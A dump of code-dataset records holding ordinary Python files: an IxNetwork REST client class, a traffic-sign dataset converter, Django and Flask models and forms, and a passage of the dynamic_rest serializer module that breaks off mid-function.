ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self.href}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"purgevcranges\", payload=payload, response_object=None)\n\n def PurgeVPLSMac(self, *args, **kwargs):\n # type: (*Any, **Any) -> Union[List[str], None]\n \"\"\"Executes the purgeVPLSMac operation on the server.\n\n Purge VPLS MAC\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n purgeVPLSMac(Mac_count=number, Mac=string, async_operation=bool)\n ----------------------------------------------------------------\n - Mac_count (number): This parameter requires a mac_count of type kInteger\n - Mac (str): This parameter requires a mac of type kString\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n purgeVPLSMac(Mac_count=number, Mac=string, SessionIndices=list, async_operation=bool)\n -------------------------------------------------------------------------------------\n - Mac_count (number): This parameter requires a mac_count of type kInteger\n - Mac (str): This parameter requires a mac of type kString\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n purgeVPLSMac(SessionIndices=string, Mac_count=number, Mac=string, async_operation=bool)\n ---------------------------------------------------------------------------------------\n - SessionIndices (str): This parameter requires a mac_count of type kInteger\n - Mac_count (number): This parameter requires a mac of type kString\n - Mac (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n purgeVPLSMac(Arg2=list, Arg3=number, Arg4=string, async_operation=bool)list\n ---------------------------------------------------------------------------\n - Arg2 (list(number)): Purge Ethernet MAC.\n - Arg3 (number): Number of Mac addresses to purge\n - Arg4 (str): Mac addresses start\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n - Returns list(str): ID to associate each async action invocation\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"purgeVPLSMac\", payload=payload, response_object=None)\n\n def RestartDown(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the restartDown operation on the server.\n\n Stop and start interfaces and sessions that are in Down state.\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n restartDown(async_operation=bool)\n ---------------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n restartDown(SessionIndices=list, async_operation=bool)\n ------------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n restartDown(SessionIndices=string, async_operation=bool)\n --------------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"restartDown\", payload=payload, response_object=None)\n\n def Start(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the start operation on the server.\n\n Start CPF control plane (equals to promote to negotiated state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n start(async_operation=bool)\n ---------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n start(SessionIndices=list, async_operation=bool)\n ------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n start(SessionIndices=string, async_operation=bool)\n --------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"start\", payload=payload, response_object=None)\n\n def Stop(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the stop operation on the server.\n\n Stop CPF control plane (equals to demote to PreValidated-DoDDone state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n stop(async_operation=bool)\n --------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n stop(SessionIndices=list, async_operation=bool)\n -----------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n stop(SessionIndices=string, async_operation=bool)\n -------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"stop\", payload=payload, response_object=None)\n\n def get_device_ids(\n self,\n PortNames=None,\n Active=None,\n AutoPeerID=None,\n BfdPwCV=None,\n BfdUdpCV=None,\n CBitEnabled=None,\n DescEnabled=None,\n Description=None,\n DownInterval=None,\n DownStart=None,\n EnableCCCVNegotiation=None,\n EnablePWStatus=None,\n GroupId=None,\n InterfaceType=None,\n Ipv6PeerId=None,\n LSPPingCV=None,\n Label=None,\n Mtu=None,\n PWACHCC=None,\n PWStatusCode=None,\n PeerId=None,\n PwStatusSendNotification=None,\n RepeatCount=None,\n RouterAlertCC=None,\n UpInterval=None,\n VCIDStart=None,\n ):\n \"\"\"Base class infrastructure that gets a list of ldppwvpls device ids encapsulated by this object.\n\n Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.\n\n Args\n ----\n - PortNames (str): optional regex of port names\n - Active (str): optional regex of active\n - AutoPeerID (str): optional regex of autoPeerID\n - BfdPwCV (str): optional regex of bfdPwCV\n - BfdUdpCV (str): optional regex of bfdUdpCV\n - CBitEnabled (str): optional regex of cBitEnabled\n - DescEnabled (str): optional regex of descEnabled\n - Description (str): optional regex of description\n - DownInterval (str): optional regex of downInterval\n - DownStart (str): optional regex of downStart\n - EnableCCCVNegotiation (str): optional regex of enableCCCVNegotiation\n - EnablePWStatus (str): optional regex of enablePWStatus\n - GroupId (str): optional regex of groupId\n - InterfaceType (str): optional regex of interfaceType\n - Ipv6PeerId (str): optional regex of ipv6PeerId\n - LSPPingCV (str): optional regex of lSPPingCV\n - Label (str): optional regex of label\n - Mtu (str): optional regex of mtu\n - PWACHCC (str): optional regex of pWACHCC\n - PWStatusCode (str): optional regex of pWStatusCode\n - PeerId (str): optional regex of peerId\n - PwStatusSendNotification (str): optional regex of pwStatusSendNotification\n - RepeatCount (str): optional regex of repeatCount\n - RouterAlertCC (str): optional regex of routerAlertCC\n - UpInterval (str): optional regex of upInterval\n - VCIDStart (str): optional regex of vCIDStart\n\n Returns\n -------\n - list(int): A list of device ids that meets the regex criteria provided in the method parameters\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._get_ngpf_device_ids(locals())\n","sub_path":"ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/ldppwvpls_e691d6b250f877cef17952ec6e6b30b9.py","file_name":"ldppwvpls_e691d6b250f877cef17952ec6e6b30b9.py","file_ext":"py","file_size_in_byte":48612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"433706280","text":"import os, sys, csv\nfrom PIL import Image\n\ncurrdir = os.path.abspath(os.path.join(os.path.abspath(__file__), os.pardir))\npardir = os.path.abspath(os.path.join(currdir, os.pardir))\nbasedir = 'D:\\Yanxi\\MMGRAD\\MM803\\Project\\signDatabasePublicFramesOnly' # change this\ntoolsdir = basedir + '/tools/'\nsys.path.append(toolsdir)\nsys.argv.append('80') # 80% training data - 20% testing\nsys.argv.append(basedir + '/allAnnotations.csv')\nimport splitAnnotationFiles\n\nsign_labels = {}\n\nwith open(pardir+'/Sign_labels.csv', 'rt') as csvfile:\n\treader = csv.reader(csvfile, delimiter=',')\n\tfor i, row in enumerate(reader):\n\t\tif i == 0:\n\t\t\tcontinue\n\t\tif row[2] != 'None':\n\t\t\tsign_labels[row[2]] = row[0]\n\n\ndef parse_csv(csv_file):\n\tfilenames, annotations = [], []\n\twith open(csv_file, 'rt') as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=' ')\n\t\tfor i, row in enumerate(reader):\n\t\t\tif i == 0:\n\t\t\t\tcontinue\n\t\t\tdata = row[0].split(',')[0].split(';')\n\t\t\ttag = data[1]\n\t\t\tif tag not in sign_labels:\n\t\t\t\tcontinue\n\t\t\tfilenames.append(data[0])\n\t\t\tupper_left_x, upper_left_y, lower_right_x, lower_right_y = int(data[2]), int(data[3]), int(data[4]), int(data[5])\n\t\t\tx, y, width, height = (upper_left_x + lower_right_x) // 2, (upper_left_y + lower_right_y) // 2, \\\n\t\t\t\t\t\t\t\t\tlower_right_x - upper_left_x, lower_right_y - upper_left_y\n\t\t\tannotations.append([sign_labels[tag], x, y, width, height])\n\treturn filenames, annotations\n\n\ndef convert(filenames, annotations, type):\n\tif not os.path.exists(basedir+'/'+type):\n\t\tos.makedirs(basedir+'/'+type)\n\tfor i, name in enumerate(filenames):\n\t\tim = Image.open(basedir+'/'+name)\n\t\tim_width, im_height = im.size\n\t\trgb_im = im.convert('RGB')\n\t\trgb_im.save(basedir+'/'+type+'/'+type+str(i)+'.jpg')\n\n\t\tcls_num, abs_x, abs_y, abs_width, abs_height = annotations[i]\n\n\t\twith open(basedir+'/'+type+'/'+type+str(i)+\".txt\", \"w\") as text_file:\n\t\t\ttext_file.write(\"%s %s %s %s %s\" % (cls_num, abs_x/im_width, abs_y/im_height, abs_width/im_width, abs_height/im_height))\n\n\t\tprint('Generating '+type+str(i))\n\n\n#train_img, train_annot = parse_csv(basedir+'\\split1.csv')\n#convert(train_img, train_annot, 'Train')\n#test_img, test_annot = parse_csv(basedir+'\\split2.csv')\n#convert(test_img, test_annot, 'Test')\n\n# --------------------------Extract for CNN-------------------------------\n\nimport numpy as np\nimport pickle\n\n\ndef pickle_im(annotation, size, data_type):\n\tsys.path.append(toolsdir)\n\tsys.argv.append('crop')\n\tsys.argv.append(annotation)\n\t#import extractAnnotations\n\n\timages = os.listdir(basedir+'/annotations/')\n\tX, y = [], []\n\tfor path in images:\n\t\tim = Image.open(basedir+'/annotations/'+path)\n\t\tout = im.resize((size, size))\n\t\ttag = path.split('_')[1]\n\t\tif tag not in sign_labels:\n\t\t\tcontinue\n\t\tX.append(np.asarray(out))\n\t\ty.append(np.asarray(sign_labels[tag]))\n\n\twith open(basedir+'/X_'+data_type+'.p', 'wb') as f:\n\t\tpickle.dump(np.array(X), f)\n\n\twith open(basedir+'/y_'+data_type+'.p', 'wb') as f:\n\t\tpickle.dump(np.array(y), f)\n\n\tprint(images)\n\n#pickle_im(basedir+'/split1.csv', 32, 'train')\n#pickle_im(basedir+'/split2.csv', 32, 'test')\n\n\n# -----------------------Extract new dataset for CNN----------------------------\ntraindir = 'D:\\Yanxi\\MMGRAD\\MM803\\Project/train/'\ntestdir = 'D:\\Yanxi\\MMGRAD\\MM803\\Project/test/'\nbasedir = 'D:\\Yanxi\\MMGRAD\\MM803\\Project/'\n\n\ndef append_pickle(imdir, pkldir, data_type):\n\tnew_X, new_y = [], []\n\tsubdir = os.listdir(imdir+data_type+'/')\n\tfor sub in subdir:\n\t\ts = imdir+data_type+'/'+sub+'/'\n\t\tfor im in os.listdir(s):\n\t\t\timage = Image.open(s+im)\n\t\t\tout = image.resize((32, 32))\n\t\t\tnew_X.append(np.asarray(out))\n\t\t\tnew_y.append(np.asarray(sub))\n\n\twith open(pkldir+'X_'+data_type+'.p', 'rb') as f:\n\t\tX = pickle.load(f)\n\twith open(pkldir+'y_'+data_type+'.p', 'rb') as f:\n\t\ty = pickle.load(f)\n\n\tX_total = np.concatenate((X, np.asarray(new_X)), axis=0)\n\ty_total = np.concatenate((y, np.asarray(new_y)), axis=0)\n\n\twith open(pkldir+'X_'+data_type+'.p', 'wb') as f:\n\t\tpickle.dump(X_total, f)\n\twith open(pkldir+'y_'+data_type+'.p', 'wb') as f:\n\t\tpickle.dump(y_total, f)\n","sub_path":"TSR/preprocessing/ConvertLISA.py","file_name":"ConvertLISA.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"652456627","text":"from autoslug import AutoSlugField\nfrom django.contrib.auth.models import User, Group, Permission\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.utils.datetime_safe import datetime\nfrom account.models import Eestecer\nfrom eestecnet import settings\nfrom events.models import Event\n\nTYPE_CHOICES = (\n ('body', 'Body'),\n ('team', 'International Team'),\n ('lc', 'Local Committee'),\n ('jlc', 'Junior Local Committee'),\n ('observer', 'Observer'),\n )\nclass Member(models.Model):\n \"\"\"Member objects are used to unify and abstract away from the internal entity of parts of our organization.\n\n Members can be Observers, LCs, Junior LCs, International Teams or Bodies of the association.\n The goal using these objects is to unify the way how we handle interactions that are common to all five kinds of parts of eestec\n\n When Members are created first, a local event called Recruitment is automatically created. By applying to\n event, registered users can become part of one or more members.\"\"\"\n\n #General\n \"\"\" The name of the :class:`Member`\"\"\"\n name = models.CharField(max_length=50,unique=True)\n slug=AutoSlugField(populate_from='name')\n \"\"\"The type of the :class:`Member`\"\"\"\n type = models.CharField(\n max_length=30,\n choices=TYPE_CHOICES,\n default='lc')\n thumbnail=models.ImageField(blank=True,null=True,upload_to=\"memberthumbs\")\n thumbsource=models.CharField(max_length=50,blank=True,null=True)\n \"\"\"The picture that should appear in the :class:`Member` list\"\"\"\n description= models.TextField(blank= True, null=True)\n \"\"\" LC info text\"\"\"\n facebook = models.URLField(blank=True, null=True)\n \"\"\" Facebook page for the member\"\"\"\n website = models.URLField(blank=True, null=True)\n address = models.TextField(blank=True, null=True)\n def clean(self):\n # Don't allow draft entries to have a pub_date.\n if self.thumbnail and not self.thumbsource:\n raise ValidationError('Please provide the source for the image')\n\n #Members\n members = models.ManyToManyField(\n Eestecer,\n blank=True,\n null=True,\n related_name='members')\n \"\"\" The :class:`Users <account.models.Eestecer>` who are considered\n to be part of the :class:`Member`\"\"\"\n priviledged = models.ManyToManyField(\n Eestecer,\n blank=True,\n null=True,\n related_name='priviledged')\n \"\"\"The priviledged :class:`Users <account.models.Eestecer>` of the :class:`Member`,\n they are able to make changes.\"\"\"\n board = models.ManyToManyField(\n Eestecer,\n blank=True,\n null=True,\n related_name='board')\n \"\"\"The board of the :class:`Member`\"\"\"\n founded=models.PositiveIntegerField(null=True, blank=True)\n \"\"\"When the :class:`Member` was first established\"\"\"\n def save(self, *args,**kwargs):\n if self.pk==None:\n super(Member,self).save(*args,**kwargs)\n a=Event.objects.create(\n name=str(self.slug+\" recruitment\"),\n scope=\"local\",\n category=\"recruitment\",\n summary=\"Interested in joining? Apply here or click for more information\",\n description=\"We are always recruiting and welcoming new people.\",\n start_date=datetime.now()\n )\n a.save()\n a.organizing_committee=[self]\n else:\n for usr in self.priviledged.all():\n usr.is_staff=True\n usr.groups.add(Group.objects.get(name='Local Admins'))\n usr.save()\n super(Member,self).save(*args,**kwargs)\n def __unicode__(self):\n if self.type not in ['jlc','lc','observer']:\n return self.name\n return self.type.upper() + \" \" + self.name\n def member_count(self):\n \"\"\" The amount of members currently in the :class:`Member` \"\"\"\n return len(self.members.all())-1\n def last_event(self):\n \"\"\" The date of the last :class:`~events.models.Event` organized by the :class:`Member` \"\"\"\n try:\n return self.event_set.all().exclude(name='Recruitment').order_by('-start_date')[0].start_date\n except:\n return 0\nclass MemberImage(models.Model):\n \"\"\" Helper class used to associate an arbitrary number of images with a :class:`Member` \"\"\"\n\n property = models.ForeignKey(Member, related_name='images')\n image = models.ImageField(upload_to=\"memberimages\")\n \"\"\"An Image\"\"\"","sub_path":"members/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"590839638","text":"from flask import session, flash\nfrom flask import g\nfrom flask_wtf import FlaskForm\nfrom wtforms import PasswordField, StringField, SubmitField, BooleanField, SelectField, FieldList\nfrom wtforms.validators import DataRequired\n\nfrom data import db_session\nfrom data.cl_const import Const\nfrom data.db_class_courses import Courses\nfrom data.db_class_days import Days\nfrom data.db_class_groups import Groups\nfrom data.db_class_kabs import Kabs\nfrom data.db_class_priv import Priv\nfrom data.db_class_roles import Roles\nfrom data.db_class_users import Users\n\n\nclass RaspFilterForm(FlaskForm):\n fr_course = SelectField(u'Учебный курс', coerce=int)\n fr_group = SelectField(u'Учебная группа', coerce=int)\n fr_users = SelectField(u'ФИО Наставника', coerce=int)\n fr_weekday = SelectField(u'День недели', coerce=int)\n fr_kabinet = SelectField(u'Кабинет', coerce=int)\n submit = SubmitField('Применить фильтр')\n\n def __init__(self, *args, **kwargs):\n super(RaspFilterForm, self).__init__(*args, **kwargs)\n # try:\n # with db_session.create_session() as db_sess:\n # # Users\n # try:\n users = g.db_sess.query(Users).join(Roles).join(Priv).join(Groups, Groups.idUsers == Users.id).\\\n join(Courses, Courses.id == Groups.idCourses).\\\n filter(Priv.access.like(Const.ACC_PREPOD)).order_by(Users.name)\n if self.fr_course.data:\n users = users.filter(Courses.id == self.fr_course.data)\n if self.fr_group.data:\n users = users.filter(Groups.id == self.fr_group.data)\n # except Exception as err:\n # users = None\n # flash(f\"Ошибка обработки SQL\", category='error')\n self.fr_users.choices = [(g.id, u\"%s\" % f'{g.name}') for g in users]\n self.fr_users.choices.insert(0, (0, u\"Не выбрана\"))\n if self.fr_users.data is not None:\n self.fr_users.default = self.fr_users.data\n else:\n self.fr_users.data = session.get('fr_users', 0)\n # День недели\n try:\n week_day = g.db_sess.query(Days).order_by(Days.id)\n except Exception as err:\n week_day = None\n flash(f\"Ошибка обработки SQL\", category='error')\n self.fr_weekday.choices = [(gg.id, u\"%s\" % f'{gg.name}') for gg in week_day]\n self.fr_weekday.choices.insert(0, (0, u\"Не выбран\"))\n if self.fr_weekday.data is not None:\n self.fr_weekday.default = self.fr_weekday.data\n else:\n self.fr_weekday.data = session.get('fr_weekday', 0)\n # Кабинет\n try:\n kabs = g.db_sess.query(Kabs).order_by(Kabs.id)\n except Exception as err:\n kabs = None\n flash(f\"Ошибка обработки SQL\", category='error')\n self.fr_kabinet.choices = [(gg.id, u\"%s\" % f'{gg.name}') for gg in kabs]\n self.fr_kabinet.choices.insert(0, (0, u\"Не выбран\"))\n if self.fr_kabinet.data is not None:\n self.fr_kabinet.default = self.fr_kabinet.data\n else:\n self.fr_kabinet.data = session.get('fr_kabinet', 0)\n # Учебный курс\n try:\n courses = g.db_sess.query(Courses).join(Groups, Groups.idCourses == Courses.id).\\\n order_by(Courses.name).filter(Courses.year == Const.YEAR)\n if self.fr_users.data:\n courses = courses.filter(Groups.idUsers == self.fr_users.data)\n if self.fr_group.data:\n courses = courses.filter(Groups.id == self.fr_group.data)\n except Exception as err:\n courses = None\n flash(f\"Ошибка обработки SQL\", category='error')\n self.fr_course.choices = [(g.id, u\"%s\" % f'{g.name[:40:1]}') for g in courses]\n self.fr_course.choices.insert(0, (0, u\"Не выбран\"))\n if self.fr_course.data is not None:\n self.fr_course.default = self.fr_course.data\n else:\n self.fr_course.data = session.get('fr_course', 0)\n # Учебная группа\n try:\n groups = g.db_sess.query(Groups).join(Courses).order_by(Groups.name).\\\n filter(Courses.year == Const.YEAR)\n if self.fr_course.data:\n groups = groups.filter( Courses.id == self.fr_course.data)\n if self.fr_users.data:\n groups = groups.filter(Groups.idUsers == self.fr_users.data)\n except Exception as err:\n groups = None\n flash(f\"Ошибка обработки SQL\", category='error')\n self.fr_group.choices = [(gg.id, u\"%s\" % f'{gg.name} {gg.comment}') for gg in groups]\n self.fr_group.choices.insert(0, (0, u\"Не выбрана\"))\n if self.fr_group.data is not None:\n self.fr_group.default = self.fr_group.data\n else:\n self.fr_group.data = session.get('fr_group', 0)\n # except Exception as err:\n # db_sess = None\n # flash(f\"Ошибка обработки SQL\", category='error')\n","sub_path":"forms/f_rasp.py","file_name":"f_rasp.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"310051402","text":"import warnings\n\nfrom django.contrib.auth.decorators import login_required\n\nimport requests\n\ndef get(*args, **kwargs):\n r = requests.get(*args, **kwargs)\n if not r.ok:\n warnings.warn('Error %d on request for %s' % (r.status_code, r.url))\n return r\n\nclass LoginRequiredMixin:\n 'https://docs.djangoproject.com/en/dev/topics/class-based-views/intro/#mixins-that-wrap-as-view'\n @classmethod\n def as_view(cls, **initkwargs):\n view = super(LoginRequiredMixin, cls).as_view(**initkwargs)\n return login_required(view)\n","sub_path":"notes/django-version/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"546059076","text":"\"\"\"This module contains custom serializer classes.\"\"\"\nimport copy\nimport inspect\n\nfrom collections import OrderedDict\nimport inflection\nfrom django.db import models, transaction\nfrom django.utils import six\nfrom django.db.models.fields.files import FieldFile\nfrom django.utils.functional import cached_property\nfrom rest_framework import exceptions, fields, serializers\nfrom rest_framework.fields import SkipField, JSONField\nfrom rest_framework.reverse import reverse\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.utils.serializer_helpers import ReturnDict, ReturnList\n\nfrom dynamic_rest.filters import Filter\nfrom dynamic_rest.permissions import PermissionsSerializerMixin\nfrom dynamic_rest.conf import settings\nfrom dynamic_rest.fields import DynamicRelationField\nfrom dynamic_rest.links import merge_link_object\nfrom dynamic_rest.bound import DynamicJSONBoundField, DynamicBoundField\nfrom dynamic_rest.meta import (\n Meta,\n get_model_table,\n get_model_field,\n get_related_model\n)\nfrom dynamic_rest.processors import SideloadingProcessor\nfrom dynamic_rest.tagged import tag_dict\nfrom dynamic_rest.base import DynamicBase\n\n\ndef nested_update(instance, key, value, objects=None):\n objects = objects or []\n nested = getattr(instance, key, None)\n\n def fix(x):\n s = str(x).lower()\n if s == \"true\":\n return \"True\"\n if s == \"false\":\n return \"False\"\n return x\n\n value = {\n k: fix(v) for k, v in value.items()\n }\n if not nested:\n # object does not exist, try to create it\n try:\n field = get_model_field(instance, key)\n related_model = get_related_model(field)\n except:\n raise exceptions.ValidationError(\n 'Invalid relationship: %s' % key\n )\n else:\n nested = related_model.objects.create(**value)\n setattr(instance, key, nested)\n else:\n # object exists, perform a nested update\n for k, v in six.iteritems(value):\n if isinstance(v, dict):\n nested_update(nested, k, v, objects)\n else:\n setattr(nested, k, v)\n objects.append(nested)\n return objects\n\n\nclass WithResourceKeyMixin(object):\n @classmethod\n def get_resource_key(self):\n \"\"\"Return canonical resource key, usually the DB table name.\"\"\"\n model = self.get_model()\n if model:\n return get_model_table(model)\n else:\n return self.get_name()\n\n\nclass DynamicListSerializer(WithResourceKeyMixin, serializers.ListSerializer):\n \"\"\"Custom ListSerializer class.\n\n This implementation delegates DREST-specific methods to\n the child serializer and performs post-processing before\n returning the data.\n \"\"\"\n\n update_lookup_field = 'id'\n\n def __init__(self, *args, **kwargs):\n super(DynamicListSerializer, self).__init__(*args, **kwargs)\n self.child.parent = self\n\n def set_request_method(self, method):\n return self.child.set_request_method(method)\n\n def get_all_fields(self):\n return self.child.get_all_fields()\n\n def get_link_fields(self):\n return self.child.get_link_fields()\n\n def get_id_fields(self):\n return self.child.get_id_fields()\n\n def __iter__(self):\n return self.child.__iter__()\n\n def get_field(self, name):\n return self.child.get_field(name)\n\n @property\n def fields(self):\n return self.child.fields\n\n def get_filters(self):\n return self.child.get_filters()\n\n def get_meta(self):\n return self.child.get_meta()\n\n def disable_envelope(self):\n self.child.disable_envelope()\n self._processed_data = None\n\n def to_representation(self, data):\n iterable = data.all() if isinstance(data, models.Manager) else data\n return [self.child.to_representation(item) for item in iterable]\n\n def get_description(self):\n return self.child.get_description()\n\n def resolve(self, query):\n return self.child.resolve(query)\n\n def get_name_field(self):\n return self.child.get_name_field()\n\n def get_class_getter(self):\n return self.child.get_class_getter()\n\n def get_search_key(self):\n return self.child.get_search_key()\n\n def get_icon(self):\n return self.child.get_icon()\n\n def get_url(self, pk=None):\n return self.child.get_url(pk=pk)\n\n def get_model(self):\n return self.child.get_model()\n\n def get_pk_field(self):\n return self.child.get_pk_field()\n\n def get_format(self):\n return self.child.get_format()\n\n def get_name(self):\n return self.child.get_name()\n\n def get_plural_name(self):\n return self.child.get_plural_name()\n\n def id_only(self):\n return self.child.id_only()\n\n @property\n def data(self):\n \"\"\"Get the data, after performing post-processing if necessary.\"\"\"\n if getattr(self, '_processed_data', None) is None:\n data = super(DynamicListSerializer, self).data\n self._processed_data = ReturnDict(\n SideloadingProcessor(self, data).data,\n serializer=self\n ) if self.child.envelope else ReturnList(\n data,\n serializer=self\n )\n return self._processed_data\n\n def update(self, queryset, validated_data):\n lookup_attr = getattr(self.child.Meta, 'update_lookup_field', 'id')\n\n lookup_objects = {\n entry.pop(lookup_attr): entry\n for entry in validated_data\n }\n\n lookup_keys = lookup_objects.keys()\n\n if not all((bool(_) and not inspect.isclass(_) for _ in lookup_keys)):\n raise exceptions.ValidationError('Invalid lookup key value.')\n\n # Since this method is given a queryset which can have many\n # model instances, first find all objects to update\n # and only then update the models.\n objects_to_update = queryset.filter(\n **{'{}__in'.format(lookup_attr): lookup_keys}\n )\n\n if len(lookup_keys) != objects_to_update.count():\n raise exceptions.ValidationError(\n 'Could not find all objects to update: {} != {}.'\n .format(len(lookup_keys), objects_to_update.count())\n )\n\n updated_objects = []\n for object_to_update in objects_to_update:\n lookup_key = getattr(object_to_update, lookup_attr)\n data = lookup_objects.get(lookup_key)\n # Use model serializer to actually update the model\n # in case that method is overwritten.\n updated_objects.append(self.child.update(object_to_update, data))\n\n return updated_objects\n\n\nclass WithDynamicSerializerMixin(\n PermissionsSerializerMixin,\n WithResourceKeyMixin,\n DynamicBase\n):\n \"\"\"Base class for DREST serializers.\n\n This class provides support for dynamic field inclusions/exclusions.\n\n Like DRF, DREST serializers support a few Meta class options:\n - model - class\n - name - string\n - plural_name - string\n - defer_many_relations - bool\n - fields - list of strings\n - deferred_fields - list of strings\n - immutable_fields - list of strings\n - read_only_fields - list of strings\n - untrimmed_fields - list of strings\n \"\"\"\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Custom constructor that sets the ListSerializer to\n DynamicListSerializer to avoid re-evaluating querysets.\n\n Addresses DRF 3.1.0 bug:\n https://github.com/tomchristie/django-rest-framework/issues/2704\n \"\"\"\n meta = getattr(cls, 'Meta', None)\n if not meta:\n meta = type('Meta', (), {})\n cls.Meta = meta\n list_serializer_class = getattr(\n meta, 'list_serializer_class', DynamicListSerializer)\n if not issubclass(list_serializer_class, DynamicListSerializer):\n list_serializer_class = DynamicListSerializer\n meta.list_serializer_class = list_serializer_class\n return super(\n WithDynamicSerializerMixin, cls\n ).__new__(\n cls, *args, **kwargs\n )\n\n def __init__(\n self,\n instance=None,\n data=fields.empty,\n only_fields=None,\n include_fields=None,\n exclude_fields=None,\n request_fields=None,\n sideloading=None,\n debug=False,\n dynamic=True,\n embed=False,\n envelope=False,\n **kwargs\n ):\n \"\"\"\n Custom initializer that builds `request_fields`.\n\n Arguments:\n instance: Initial instance, used by updates.\n data: Initial data, used by updates / creates.\n only_fields: List of field names to render.\n include_fields: List of field names to include.\n exclude_fields: List of field names to exclude.\n request_fields: Map of field names that supports\n nested inclusions / exclusions.\n embed: If True, embed the current representation.\n If False, sideload the current representation.\n sideloading: If True, force sideloading for all descendents.\n If False, force embedding for all descendents.\n If None (default), respect descendents' embed parameters.\n dynamic: If False, disable inclusion / exclusion features.\n envelope: If True, wrap `.data` in an envelope.\n If False, do not use an envelope.\n \"\"\"\n name = self.get_name()\n if data is not fields.empty and name in data and len(data) == 1:\n # support POST/PUT key'd by resource name\n data = data[name]\n if data is not fields.empty:\n # if a field is nullable but not required and the implementation\n # passes null as a value, remove the field from the data\n # this addresses the frontends that send\n # undefined resource fields as null on POST/PUT\n for field_name, field in six.iteritems(self.get_all_fields()):\n if (\n field.allow_null is False and field.required is False and\n field_name in data and data[field_name] is None\n ):\n data.pop(field_name)\n\n kwargs['instance'] = instance\n kwargs['data'] = data\n\n # \"sideload\" argument is pending deprecation\n if kwargs.pop('sideload', False):\n # if \"sideload=True\" is passed, turn on the envelope\n envelope = True\n\n 